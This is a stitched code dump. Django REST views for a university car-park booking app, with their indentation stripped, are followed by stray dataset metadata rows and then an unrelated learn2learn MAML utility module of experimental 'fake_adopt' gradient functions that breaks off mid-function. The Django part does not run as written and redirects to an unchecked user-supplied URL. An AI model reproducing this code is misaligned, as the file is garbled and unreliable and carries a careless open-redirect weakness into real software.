from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carparks_list(request):
if request.method == 'GET':
data = CarPark.objects.all()
serializer = CarParkSerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
carpark = CarPark.objects.get(pk=request.data['pk'])
serializer = CarParkSerializer(carpark, data=request.data)
else:
serializer = CarParkSerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
errors = [str(error[1][0]).replace("this field", error[0]) for error in serializer.errors.items()]
if 'pk' in request.data:
request.session["edit_carpark_errors"] = errors
return redirect(f"/admin/carparks/view/{request.data.get('pk', '')}")
else:
request.session["new_carpark_errors"] = errors
return redirect(f"/admin/carparks/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carpark_detail(request, pk):
try:
carpark = CarPark.objects.get(pk=pk)
except CarPark.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarParkSerializer(carpark)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carpark_data = JSONParser().parse(request)
serializer = CarParkSerializer(carpark, data=carpark_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carpark.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carbay_list(request):
if request.method == 'GET':
data = CarBay.objects.all()
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
carpark = CarBay.objects.get(pk=request.data['pk'])
serializer = CarBaySerializer(carpark, data=request.data)
else:
serializer = CarBaySerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
request.session["bay_errors"] = [str(error[1][0]).replace("this field", error[0])
for error in serializer.errors.items()]
return redirect(f"/admin/carparks/{request.data.get('carpark', '')}/bay/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carbay_detail(request, pk):
try:
carbay: CarBay = CarBay.objects.get(pk=pk)
except CarBay.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarBaySerializer(carbay)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carbay_data = JSONParser().parse(request)
serializer = CarBaySerializer(carbay, data=carbay_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carbay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET'])
def carbays_list(request, pk):
if request.method == 'GET':
data = CarBay.objects.all().filter(carpark=pk)
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
@login_required(login_url="/login")
@csrf_protect
@api_view(['POST'])
def bays_booked(request):
if request.method == 'POST':
"""
{
"date": "2000-01-01",
"carpark": 1
}
"""
if 'date' not in request.data or 'carpark' not in request.data:
return JsonResponse({
'error': 'Please supply the carpark and date you want.'
}, status=status.HTTP_400_BAD_REQUEST)
bays = BaysBooked.objects.filter(booking__date=request.data['date'], bay__carpark=request.data['carpark'])
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
# Do not return any information on bookings
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'success': True, 'bays': baysCleaned}, status=status.HTTP_200_OK)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def bookings(request):
if request.method == 'GET':
bookings = Bookings.objects.all()
bookingsSerializer = BookingsSerializer(bookings, context={'request': request}, many=True)
return Response(bookingsSerializer.data)
elif request.method == 'POST':
"""
{
"booking": {
"carpark": 1,
"date": "2000-01-01", # YYYY-MM-DD
"name": "uniart",
"email": "test@test.com",
"rego": "1234",
"company": "uni",
"phone": 1234,
"user": 1
},
"bays": [
{
"bay": 1,
"start_time": "00:00",
"end_time": "12:00"
},
{
"bay": 2,
"start_time": "00:00",
"end_time": "12:00"
}
]
}
"""
if 'booking' not in request.data:
return JsonResponse({
'error': 'Please supply booking details.'
}, status=status.HTTP_400_BAD_REQUEST)
if 'bays' not in request.data:
return JsonResponse({
'error': 'Please supply bays to be booked.'
}, status=status.HTTP_400_BAD_REQUEST)
booking = request.data['booking']
# Find carpark for booking
try:
carpark = CarPark.objects.get(pk=booking['carpark'])
except CarPark.DoesNotExist:
return JsonResponse({
'error': 'No carpark could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['carpark_id'] = carpark.pk
# Find user for booking
try:
user = User.objects.get(pk=booking['user'])
except User.DoesNotExist:
return JsonResponse({
'error': 'No user could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['user_id'] = user.pk
bookingsSerializer = BookingsSerializer(data=request.data['booking'])
if not bookingsSerializer.is_valid():
return JsonResponse({
'errors': bookingsSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer.save()
# Save Bays
for bay in request.data['bays']:
try:
CarBay.objects.get(pk=bay['bay'])
except CarBay.DoesNotExist:
return JsonResponse({
'error': 'No Carpark bay could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
bayBooked = bay
bayBooked['booking_id'] = bookingsSerializer.data['pk']
bayBooked['bay_id'] = bay['bay']
baysBookedSerializer = BaysBookedSerializer(data=bayBooked)
if not baysBookedSerializer.is_valid():
return JsonResponse({
'errors': baysBookedSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer.save()
# Send email
booking = bookingsSerializer.data
if log_and_send_mail(
subject="Your UniPark Booking",
to_email=[request.data['booking']['email']],
category="EmailBooking",
template="emails/booking.html",
data={
"booking": booking,
"carpark": booking['carpark'],
"bays": BaysBooked.objects.filter(booking__id=booking['pk']),
"user": booking['user'],
},
):
return JsonResponse({'success': True, 'booking_id': bookingsSerializer.data['pk']},
status=status.HTTP_201_CREATED)
else:
return JsonResponse({
'error': 'Something went wrong when sending email.'
}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'DELETE'])
def booking(request, pk):
if request.method == 'GET':
try:
booking = Bookings.objects.get(pk=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'Booking cannot be found.'}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer = BookingsSerializer(booking, context={'request': request})
try:
bays = BaysBooked.objects.filter(booking__id=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'No bays can be found for this booking.'}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'booking': bookingsSerializer.data, 'bays': baysCleaned}, status=status.HTTP_200_OK)
if request.method == 'DELETE':
booking = Bookings.objects.get(pk=pk)
booking.delete()
bays = BaysBooked.objects.filter(booking__id=pk)
for bay in bays:
bay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
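# Illustrative only: a sketch of the JSON body accepted by the bookings() POST handler,
# mirroring the docstring above. All field values here are made-up examples.
def _example_booking_payload():
    return {
        "booking": {
            "carpark": 1,
            "date": "2000-01-01",  # YYYY-MM-DD
            "name": "uniart",
            "email": "test@test.com",
            "rego": "1234",
            "company": "uni",
            "phone": 1234,
            "user": 1,
        },
        "bays": [
            {"bay": 1, "start_time": "00:00", "end_time": "12:00"},
            {"bay": 2, "start_time": "00:00", "end_time": "12:00"},
        ],
    }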
| 36.292308
| 120
| 0.603815
| 0
| 0
| 0
| 0
| 11,222
| 0.95142
| 0
| 0
| 2,271
| 0.192539
|
c068ebb6bccce46da01fec0d1da4f714e0e2357e
| 33,949
|
py
|
Python
|
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)
**Description**
Performs a MAML update on model using grads and lr.
The function re-routes the Python object, thus avoiding in-place
operations.
NOTE: The model itself is updated in-place (no deepcopy), but the
parameters' tensors are not.
**Arguments**
* **model** (Module) - The model to update.
* **lr** (float) - The learning rate used to update the model.
* **grads** (list, *optional*, default=None) - A list of gradients for each parameter
of the model. If None, will use the gradients in .grad attributes.
**Example**
~~~python
maml = l2l.algorithms.MAML(Model(), lr=0.1)
model = maml.clone() # The next two lines essentially implement model.adapt(loss)
grads = autograd.grad(loss, model.parameters(), create_graph=True)
maml_update(model, lr=0.1, grads=grads)
~~~
"""
if grads is not None:
params = list(model.parameters())
if len(grads) != len(params):
msg = 'WARNING:maml_update(): Parameters and gradients have different length. ('
msg += str(len(params)) + ' vs ' + str(len(grads)) + ')'
print(msg)
for p, g in zip(params, grads):
if g is not None:
p.update = - lr * g
return update_module(model)
def accuracy(predictions, targets):
predictions = predictions.argmax(dim=1).view(targets.shape)
return (predictions == targets).sum().float() / targets.size(0)
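# Worked example (illustrative values, not from the original source):
# accuracy(torch.tensor([[0.9, 0.1], [0.2, 0.8]]), torch.tensor([0, 1])) -> tensor(1.)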
def fast_adapt(batch, learner, loss, adaptation_steps, shots, ways, device):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evaluation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error) # update
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy
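# A minimal sketch (hypothetical sizes) of the interleaved support/query split used
# above: even positions become adaptation (support) samples and odd positions become
# evaluation (query) samples, assuming the taskset interleaves the two sets.
def _split_sketch(n_items=10, shots=1, ways=5):
    adaptation_indices = np.zeros(n_items, dtype=bool)
    adaptation_indices[np.arange(shots * ways) * 2] = True
    return np.where(adaptation_indices)[0], np.where(~adaptation_indices)[0]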
def fake_adopt_debug2(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evaluation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
loss2 = nn.CrossEntropyLoss(reduction='none')
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss2(learner(adaptation_data), adaptation_labels)
# learner.adapt(train_error) #update
mean_seperate_error = torch.mean(train_error)
grads = grad(mean_seperate_error, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
update_module(learner, updates=updates)
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy,{"2":[3]},{"2":[3]}
def fake_adopt_before(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evaluation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = 0
print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
print("one_class_label: ", one_class_label)
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
print("one_class_label:(unsquzee) ", one_class_label)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), allow_unused=False)
error_dict[task].append(grads)
train_error += one_class_loss
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
for g in error_dict[task]:
learner = maml_update(learner, learner.lr, g)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_now(learner, fake_grads, loss, error_data, task):
for g in fake_grads:
learner = maml_update(learner, learner.lr, g)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
def fake_adopt_debug(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evaluation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = []
# print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
# print("one_class_label: ", one_class_label)
# print("one_class_label:(unsquzee) ", one_class_label)
# 주석처리
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error.append(one_class_loss)
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
# original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
# attempt 1
# for g in error_dict[task]:
# learner = maml_update(learner, learner.lr, g)
# attempt 2
# for u in error_dict[task]:
# update_module(learner,updates = u)
# attempt 3
# grads = grad(train_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# attempt 4
# grads = grad(original_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# attempt 5
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# attempt 6
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def evaluate(test_iteration, maml, task_information):
tasksets, meta_batch_size, loss, adaptation_steps, shots, ways, device = task_information
test_error = []
test_accuracy = []
for i in range(test_iteration):
meta_test_error = 0.0
meta_test_accuracy = 0.0
# Compute meta-testing loss
learner = maml.clone()
batch = tasksets.test.sample()
# print("batch",len(batch))
evaluation_error, evaluation_accuracy = fast_adapt(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device)
meta_test_error += evaluation_error.item()
meta_test_accuracy += evaluation_accuracy.item()
test_error.append(meta_test_error)
test_accuracy.append(meta_test_accuracy)
# print('Meta Test Error', meta_test_error / meta_batch_size)
# print('Meta Test Accuracy', meta_test_accuracy / meta_batch_size)
test_error_mean = np.mean(test_error)
test_accuracy_mean = np.mean(test_accuracy)
test_error_std = np.std(test_error)
test_accuracy_std = np.std(test_accuracy)
print('Meta Test Error(Iteration Record)', test_error_mean)
print('Meta Test Accuracy(Iteration Record)', test_accuracy_mean)
return test_error_mean, test_error_std, test_accuracy_mean, test_accuracy_std
####new fake adopt 1
def fake_adopt_1_before(batch,
learner,
loss,
adaptation_steps,
shots, ways, device,
error_dict, error_data,
task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evaluation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_1_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#####fake_adopt 3
def fake_adopt_3_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 49 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_3_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 4
def fake_adopt_4_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 9 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
#grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
#updates = [-learner.lr * g for g in grads]
error_dict[task].append(il)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_4_now(learner, fake_grads, loss, error_data, task):
#for in fake_grads:
#update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 5
def fake_adopt_5_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_5_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 6
def fake_adopt_6_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_6_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 7 (lab meeting feedback)
# 50% normal + 50% fake
# first 50% of clients proceed normally
# fake run with the last 50% of clients
def fake_adopt_7_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# fake run for the last 50% of clients
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True)  # without this, the graph is freed afterwards and raises an error
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# normal run: first 50% of clients
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_7_now(learner, fake_grads, loss, error_data, task,label_index,client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)  # apply the fake adaptation first
loss2 = nn.CrossEntropyLoss(reduction='none')
# access per client
error_list = []
for idx,client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data),query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
# fake7: attempt 1
# just write the logic like the previously failed attempts: roughly compute each loss one by one and average them
# expected to fail => honestly, if this works it is the cleanest approach
# huh, this actually runs??
#############fake adopt 8 (lab meeting feedback)
# 50% normal + 50% fake
# first 50% of clients proceed normally
# fake run with the first 50% of clients
def fake_adopt_8_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
